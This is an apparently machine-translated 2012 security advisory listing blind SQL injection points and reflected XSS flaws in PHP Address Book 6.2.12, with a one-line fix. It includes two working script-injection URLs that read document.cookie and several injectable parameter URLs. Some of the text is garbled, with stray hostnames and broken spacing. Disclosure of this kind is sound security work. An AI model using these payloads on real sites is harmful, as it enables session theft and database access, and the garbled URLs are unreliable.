PHP Address Book 6.2.12 multiple security flaws and fixes-vulnerability warning-the black bar safety net

2012-03-13T00:00:00
ID MYHACK58:62201233332
Type myhack58
Reporter 佚名
Modified 2012-03-13T00:00:00

Description

Author: Stefan Schurtz

Affected Software: Successfully tested on PHP Address Book 6.2.12

Developer URL: http://sourceforge.net/projects/php-addressbook/

Defect description

==========================

PHP Address Book 6.2.12 is containing multiplexssand sql injection issues

==================

The test proved

==================

// Blind

http://www.badguest.cn /addressbook/edit. php? id=[sql-injection]

http://www.badguest.cn /addressbook/group. php? add=Add to&group=1&selected%5b%5d=1 3 2&to_group=[sql-injection]

http://[target]/addressbook/vcard. php? id=[sql-injection]

// XSS

http://[target]/addressbook/preferences. php? from='"</script><script>alert(document. cookie)</script>

http://[target]/addressbook/index. php? group='"</script><script>alert(document. cookie)</script>

Fix:

For the above code to filter the corresponding page